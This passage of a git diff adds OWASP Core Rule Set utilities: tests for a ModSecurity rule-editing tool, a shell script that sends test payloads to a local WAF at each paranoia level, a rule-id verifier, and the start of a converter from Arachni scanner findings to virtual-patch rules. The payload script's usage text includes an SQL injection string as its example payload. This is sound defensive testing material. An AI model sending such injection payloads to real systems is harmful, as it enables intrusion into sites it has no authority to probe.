ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRemoveTfunc: + def test_remove_tfunc_with_no_transformations(self): + arguments = [ + "--remove-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_tfunc_with_existing_transformations(self): + arguments = [ + "--remove-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_with_multiple_args(self): + arguments = [ + "--remove-tfunc", "lower", + "--remove-tfunc", "decodeUrl" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_with_chain(self): + arguments = [ + "--remove-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_skip_chain(self): + arguments = [ + "--remove-tfunc", "lower", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_retains_correct_line_numbers(self): + arguments = [ + "--remove-tfunc", "lowercase" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:none,t:lowercase,\\ + msg:'PHP Injection Attack: PHP Script File Upload Found'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:none,\\ + msg:'PHP Injection Attack: PHP Script File Upload Found'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_variables_test.py b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_variables_test.py new file mode 100644 index 00000000..48923aaf --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_variables_test.py @@ -0,0 +1,327 @@ +from .helpers import * + +class TestAppendVariable: + def test_append_variable_with_one_variable(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|XML "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_variable_with_existing_variables(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_variable_with_duplicate_variable(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_variable_with_multiple_args(self): + arguments = [ + "--append-variable", "XML", + "--append-variable", "DURATION", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML|DURATION "@rx foo" "id:12" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_variable_with_chain(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_variable_skip_chain(self): + arguments = [ + "--append-variable", "XML", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRemoveVariable: + def test_remove_variable_with_no_variable(self): + arguments = [ + "--remove-variable", "XML", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_variable_with_existing_variable(self): + arguments = [ + "--remove-variable", "XML", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_variable_with_multiple_args(self): + arguments = [ + "--remove-variable", "XML", + "--remove-variable", "DURATION", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|DURATION|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_variable_with_chain(self): + arguments = [ + "--remove-variable", "XML", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_variable_skip_chain(self): + arguments = [ + "--remove-variable", "XML", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestReplaceVariable: + def test_replace_variable_name_with_no_variable(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_with_existing_variable(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_with_multiple_args(self): + arguments = [ + "--replace-variable", "XML,ARGS:xml", + "--replace-variable", "DURATION,ARGS:duration", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|DURATION|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:xml|ARGS:foo|ARGS:duration|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_with_chain(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_skip_chain(self): + arguments = [ + "--replace-variable", "XML,DURATION", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_no_variable(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_existing_variable(self): + arguments = [ + "--replace-variable", "XML,!DURATION:half-life", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|!DURATION:half-life|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_multiple_args(self): + arguments = [ + "--replace-variable", "&XML,ARGS:xml", + "--replace-variable", "!DURATION:half-life,ARGS:duration", + ] + rule_string = """ +SecRule ARGS|&XML|ARGS:foo|!DURATION:half-life|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:xml|ARGS:foo|ARGS:duration|!ARGS:bar "@rx foo" "id:12" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_chain(self): + arguments = [ + "--replace-variable", "!XML:'lisa',&DURATION:\"bart\"", + ] + rule_string = """ +SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_skip_chain(self): + arguments = [ + "--replace-variable", "!XML:'lisa',&DURATION:\"bart\"", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/nginx/config/owasp-crs/util/send-payload-pls.sh b/nginx/config/owasp-crs/util/send-payload-pls.sh new file mode 100755 index 00000000..168736a0 --- /dev/null +++ b/nginx/config/owasp-crs/util/send-payload-pls.sh @@ -0,0 +1,171 @@ +#!/bin/bash +# +# Script to post a payload against a local webserver at each paranoia level. +# +# Note: Webserver has to be prepared to take desired PL as Request Header "PL". +# +# WARNING: Setting the paranoia level using a header without proper +# authentication and authorization is extremely dangerous, and is not +# recommended for production. +# +# Check how to use the Christian Folini's Apache access log format at: +# https://www.netnea.com/cms/apache-tutorial-5_extending-access-log/ +# +# LogFormat "%h %{GEOIP_COUNTRY_CODE}e %u [%{%Y-%m-%d %H:%M:%S}t.%{usec_frac}t] \"%r\" %>s %b \ +# \"%{Referer}i\" \"%{User-Agent}i\" \"%{Content-Type}i\" %{remote}p %v %A %p %R \ +# %{BALANCER_WORKER_ROUTE}e %X \"%{cookie}n\" %{UNIQUE_ID}e %{SSL_PROTOCOL}x %{SSL_CIPHER}x \ +# %I %O %{ratio}n%% %D %{ModSecTimeIn}e %{ApplicationTime}e %{ModSecTimeOut}e \ +# %{ModSecAnomalyScoreInPLs}e %{ModSecAnomalyScoreOutPLs}e \ +# %{ModSecAnomalyScoreIn}e %{ModSecAnomalyScoreOut}e" extended +# +# This script assumes %{ModSecAnomalyScoreIn}e is the column before to last in +# the access log, if this does not match your LogFormat the script won't work +# For better results set the SecDefaultAction to 'pass'. +# +# The anomaly score envvar can be set as follows: +# SecAction "id:90101,phase:5,pass,nolog,\ +# setenv:ModSecAnomalyScoreIn=%{TX.blocking_inbound_anomaly_score}" +# +# Sample rule to setup the PL dynamically from localhost" +# SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,192.168.0.128" \ +# "id:90102,phase:1,pass,capture,log,auditlog,\ +# msg:'Setting engine to PL%{matched_var}',chain" +# SecRule REQUEST_HEADERS:PL "@rx ([1-4])" \ +# "setvar:'tx.detection_paranoia_level=%{matched_var}'" + +# Path to CRS rule set and local files +CRS="/usr/share/modsecurity-crs/rules" +accesslog="/apache/logs/access.log" +errorlog="/apache/logs/error.log" +URL="localhost:40080" +protocol="http" +while [[ $# > 0 ]] +do + case "$1" in + -c|--crs) + CRS="$2" + shift + ;; + -a|--access) + accesslog="$2" + shift + ;; + -e|--error) + errorlog="$2" + shift + ;; + -u|--url) + URL="$2" + shift + ;; + -r|--resolve) + resolve="$2" + resolve="--resolve $resolve" + shift + ;; + --protocol) + protocol="$2" + shift + ;; + -P|--payload) + PAYLOAD="$2" + shift + ;; + -h|--help) + echo "Usage:" + echo " --access \"/apache/logs/access.log\"" + echo " --error \"/apache/logs/error.log\"" + echo " --crs \"/usr/share/modsecurity-crs/rules\"" + echo " --url \"localhost:40080\"" + echo " --resolve \"someservername:40080:localhost\"" + echo " --protocol \"https\"" + echo " --payload \"/tmp/payload\"" + echo " --help" + exit 1 + ;; + esac + shift +done + +echo "Using CRS: $CRS" +echo "Using accesslog: $accesslog" +echo "Using errorlog: $errorlog" +echo "Using URL: $URL" +echo "Using protocol: $protocol" + +if [ -z "${PAYLOAD+x}" ]; then + echo "Please submit valid payload file as parameter. This is fatal. Aborting." + $0 -h + echo "Examples:" + echo " ./send-payload-pls.sh -a /logs/test/access.log \ + -e /logs/test/error.log -u test.test.test.com:6443 --protocol https \ + --payload /tmp/payload --resolve test.test.test.com:6443:192.168.0.128" + echo " ./send-payload-pls.sh -a /logs/test/access.log \ + -e /logs/test/error.log -u test.test.test.com:6443 --protocol https \ + --payload 'or 1=1;--' --resolve test.test.test.com:6443:192.168.0.128" + exit 1 +fi + +# URL of web server + +# Rules per Paranoia level +# Paranoia level 1 rules, rule 012 is the delimiter of the start of PL1 +# Paranoia level 1 rules, rule 013 is the delimiter of the end of PL1 +PL1=$(awk "/012,phase:2/,/013,phase:1/" $CRS/*.conf |egrep -v "(012|013),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') + +# Paranoia level 2 rules, rule 014 is the delimiter of the start of PL2 +# Paranoia level 2 rules, rule 015 is the delimiter of the end of PL2 +PL2=$(awk "/014,phase:2/,/015,phase:1/" $CRS/*.conf |egrep -v "(014|015),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') + +# Paranoia level 3 rules, rule 016 is the delimiter of the start of PL3 +# Paranoia level 3 rules, rule 017 is the delimiter of the end of PL3 +PL3=$(awk "/016,phase:2/,/017,phase:1/" $CRS/*.conf |egrep -v "(016|017),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') + +# Paranoia level 4 rules, rule 018 is the delimiter of the start of PL4 +# Paranoia level 4 rules, "Paranoia Levels Finished" delimiter of the end of PL4 +PL4=$(awk "/018,phase:2/,/Paranoia Levels Finished/" $CRS/*.conf |egrep -v "018,phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') + +echo "Sending the following payload at multiple paranoia levels: $PAYLOAD" +echo + +for PL in 1 2 3 4; do + echo "--- Paranoia Level $PL ---" + echo + if [ -f "$PAYLOAD" ]; then + curl $protocol://$URL $resolve -k --data-binary "@$PAYLOAD" -H "PL: $PL" -o /dev/null -s + else + curl $protocol://$URL $resolve -k -d "$PAYLOAD" -H "PL: $PL" -o /dev/null -s + fi + + # Here are three ways to get the transaction unique id, + # the first one is Christian's format, second is Spartan's format, + # and the third one tries to guess which is the unique id using a + # regular expression, the first two require specific format. + # The automatic format detection may cause the script to malfunction. + # Uncomment only the required format. + # To use Christian's accesslog format uncomment the following line + #uniq_id=$(tail -1 $accesslog | cut -d\" -f11 | cut -b2-26) + + # To use Spartan's accesslog format (21 col) uncomment the following line + #uniq_id=$(tail -1 $accesslog | awk '{print $21}') + + # To use the automatic unique_id detection uncomment the following line + uniq_id=$(tail -1 $accesslog | egrep -o '\b[a-zA-Z0-9_-]{26,28}\b') + + echo "Tracking unique id: $uniq_id" + + grep $uniq_id $errorlog | sed -e "s/.*\[id \"//" -e "s/\(......\).*\[msg \"/\1 /" -e "s/\"\].*//" -e "s/(Total .*/(Total ...) .../" -e "s/Inbound and Outbound Score: [0-9]* [0-9]*/Inbound and Outbound Score: .../" | sed -e "s/$PL1/& PL1/" -e "s/$PL2/& PL2/" -e "s/$PL3/& PL3/ " -e "s/$PL4/& PL4/" | sort -k2 | sed -r "s/^([0-9]+)$/\1 FOREIGN RULE NOT IN CRS/" + + echo + echo -n "Total Inbound Score: " + + # Here are two ways to get the transaction anomaly score, + # the first one is Christian's format, second is Spartan's format + # To use Christian's accesslog format uncomment the following line + tail -1 $accesslog | cut -d\" -f11 | cut -d\ -f14 | tr "-" "0" + + # To use Spartan's accesslog format (21 col) uncomment the following line + # To use a different column change the $NF value, e.g. $(NF-1) + #tail -1 $accesslog | awk '{print $NF}' | tr "-" "0" + echo +done diff --git a/nginx/config/owasp-crs/util/verify.rb b/nginx/config/owasp-crs/util/verify.rb new file mode 100755 index 00000000..6619fcbc --- /dev/null +++ b/nginx/config/owasp-crs/util/verify.rb @@ -0,0 +1,117 @@ +#!/usr/bin/env ruby +# -*- coding: utf-8 -*- +# +# Copyright © 2012 Diego Elio Pettenò +# +# Permission to use, copy, modify, and distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS +# ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES +# OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE +# CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL +# DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR +# PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS +# SOFTWARE. + +require 'set' + +seen_ids = Set.new +res = 0 + +# read reserved id range from the id-range file so that it can be +# configured on a per-repository basis. +range = Range.new(*File.read('id-range').rstrip.split('-').map(&:to_i)) + +# open all the rule files +Dir.chdir("../") +Dir["**/*.conf"].each do |rulefile| + # read the content + content = File.read(rulefile) + + lineno = 0 + this_chained = next_chained = false + prevline = nil + + # for each line in the rule file + content.each_line do |line| + lineno += 1 + + # handle continuation lines + line = (prevline + line) unless prevline.nil? + + # remove comments + line.gsub!(/^([^'"]|'[^']+'|"[^"]+")#.*/) { $1 } + + if line =~ /\\\n$/ + prevline = line.gsub(/\\\n/, '') + next + else + prevline = nil + end + + # skip if it's an empty line (this also skip comment-only lines) + next if line =~ /(?:^\s+$|^#)/ + + this_chained = next_chained + next_chained = false + + # split the directive in its components, considering quoted strings + directive = line.scan(/([^'"\s][^\s]*[^'"\s]|'(?:[^']|\\')*[^\\]'|"(?:[^"]|\\")*[^\\]")(?:\s+|$)/).flatten + directive.map! do |piece| + # then make sure to split the quoting out of the quoted strings + (piece[0] == '"' || piece[0] == "'") ? piece[1..-2] : piece + end + + # skip if it's not a SecRule or SecAction + case directive[0] + when "SecRule" + rawrule = directive[3] + when "SecAction" + rawrule = directive[1] + else + next + end + + # get the rule and split in its components + rule = (rawrule || "").gsub(/(?:^"|"$)/, '').split(/\s*,\s*/) + + if rule.include?("chain") + next_chained = true + end + + ids = rule.find_all { |piece| piece =~ /^id:/ } + if ids.size > 1 + $stderr.puts "#{rulefile}:#{lineno} rule with multiple ids" + next + elsif ids.size == 0 + id = nil + else + id = ids[0].sub(/^id:/, '').gsub(/(?:^'|'$)/, '').to_i + end + + if this_chained + unless id.nil? + $stderr.puts "#{rulefile}:#{lineno} chained rule with id" + res = 1 + end + next + elsif id.nil? + $stderr.puts "#{rulefile}:#{lineno} rule missing id (#{rule.join(',')})" + res = 1 + next + elsif ! range.include?(id) + $stderr.puts "#{rulefile}:#{lineno} rule with id #{id} outside of reserved range #{range}" + res = 1 + elsif seen_ids.include?(id) + $stderr.puts "#{rulefile}:#{lineno} rule with duplicated id #{id}" + res = 1 + end + + seen_ids << id + end +end + +exit res diff --git a/nginx/config/owasp-crs/util/virtual-patching/arachni2modsec.pl b/nginx/config/owasp-crs/util/virtual-patching/arachni2modsec.pl new file mode 100755 index 00000000..9b6a3c25 --- /dev/null +++ b/nginx/config/owasp-crs/util/virtual-patching/arachni2modsec.pl @@ -0,0 +1,318 @@ +#!/opt/local/bin/perl -T + +############################################# +# -=[ Virtual Patching Converter Script ]=- # +# Converts arachni XML Output # +# https://github.com/Zapotek/arachni # +# # +# arachni2modsec.pl # +# Version: 1.0 # +# # +# Copyright 2011 # +# Trustwave's SpiderLabs Research Team # +# www.trustwave.com # +# # +# Based On Code Originally Created by: # +# The Denim Group # +# www.denimgroup.com # +############################################# + +use XML::Smart; +use Switch; +use Data::Types qw(:all); +use Data::Validate::URI qw(is_uri); +use Getopt::Std; +use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later + +############# +# Variables # +############# + +# [Configuration Vars] +my %param; +getopt("f",\%param); +$filename = $param{f}; +my $all_vulnerabilities_filename = "$filename"; + +unless ($filename) { + print "Flag:\n\n\t -f:\t path to arachni xml report file\nUsage:\n\n\t./arachni2modsec.pl -f ./arachni_report.xml\n\n"; + exit; +} + + +my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf"; + +# [End Config Vars] + +my $VULN_CLASS_XSS = "Cross-Site Scripting (XSS)"; +my $VULN_CLASS_SQLI = "SQL Injection"; +my $VULN_CLASS_BLIND_SQLI = "Blind SQL Injection"; +my $VULN_CLASS_LFI = "Path Traversal"; +my $VULN_CLASS_RFI = "Remote file inclusion"; +my $VULN_CLASS_HTTPRS = "Response splitting"; + +# Only the vulnerabilities in this array will have +# rules generated for them. +my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_BLIND_SQLI, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS); + +my $num_rules_generated=0; +my $num_not_supported=0; +my $num_bad_urls=0; + +my $wait_for_keypress=1; +my $request_failed=0; + +my $all_vulns_xml; +my @type; +my @id; +my $vuln_count; + +my $num_attacks_flag=0; +my $num_attacks_noflag=0; + +# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +############# +# Main # +############# + +# Clean up env so perl doesn't complain +# when trying to run the restart snort +# script. +delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)}; + +$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename); + +@type = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','name'); +@url = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','url'); +@param = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','variable'); + +open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file"; +$MODSEC_RULES->autoflush(1); + +$vuln_count = 0; + +foreach my $current_type (@type){ + print "==================================================================================================\n"; + print "Vulnerability[$vuln_count] - Type: $current_type\n"; + + if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){ + parseData(to_string($current_type)); + }else { + print "Vulnerability Type: $type is not supported in this version.\n"; + $num_not_supported++; + } + $vuln_count++; +} + +close($MODSEC_RULES); + +print "==================================================================================================\n"; + +print "\n\n************ END OF SCRIPT RESULTS *****************\n"; +print "Number of Vulnerabilities Processed: $vuln_count\n"; +print "Number of ModSecurity rules generated: $num_rules_generated\n"; +print "Number of Unsupported vulns skipped: $num_not_supported\n"; +print "Number of bad URLs (rules not gen): $num_bad_urls\n"; +print "****************************************************\n\n"; +print "----------------------------------------------------\n"; +print "To activate the virtual patching file ($modsec_rules_file),\n"; +print "copy it into the CRS \"base_rules\" directory and then create\n"; +print "a symlink to it in the \"activated_rules\" directory.\n"; +print "-----------------------------------------------------\n\n"; + + +############### +# Subroutines # +############### +sub parseData +{ + my($vuln_str) = @_; + my $vuln_detail_filename; + my $current_vuln_xml; + my $current_vuln_url; + my $current_vuln_param; + my $current_uricontent; + my @current_params; + my $id = $vuln_count; + + print "Found a $vuln_str vulnerability.\n"; + + $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename); + $current_vuln_url = $url[$vuln_count]; + + print URL_LIST "$current_vuln_url\n"; + + # Validate url (need separate sub?) + print "Validating URL: $current_vuln_url\n"; + if(is_uri(to_string($current_vuln_url))){ + print "URL is well-formed\n"; + print "Continuing Rule Generation\n"; + } else { + print "URL is NOT well-formed. Breaking Out of Rule Generation\n"; + $num_bad_urls++; + + # Waits for keypress in test mode so you can + # see why the URL failed validation. + if($test_mode){ + wait_for_keypress(); + } + return; + } + + $current_uricontent = get_uricontent($current_vuln_url); + + + # Only need param if XSS attack,SQLINJ,XPATH + # and maybe for HTTPRS, DT. + # NOT for PRL and DI + + if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ + @current_params = $param[$vuln_count]; + + } + if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ + print "Current vulnerable Param(s): @current_params\n"; + } + + generate_patch($vuln_str,$current_uricontent,@current_params); + + +} + + +sub generate_patch +{ + my($type,$uricontent,@params,$current_vuln_xml) = @_; + my $rule = ""; + $id = "1".$vuln_count; + + switch($type) + { + case ($VULN_CLASS_XSS) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + # Check to see if each vulnerable parameter is valid + # then generate a rule using both uricontent and the + # parameter + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + } + } + } + } + + case ($VULN_CLASS_SQLI) + { + + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for 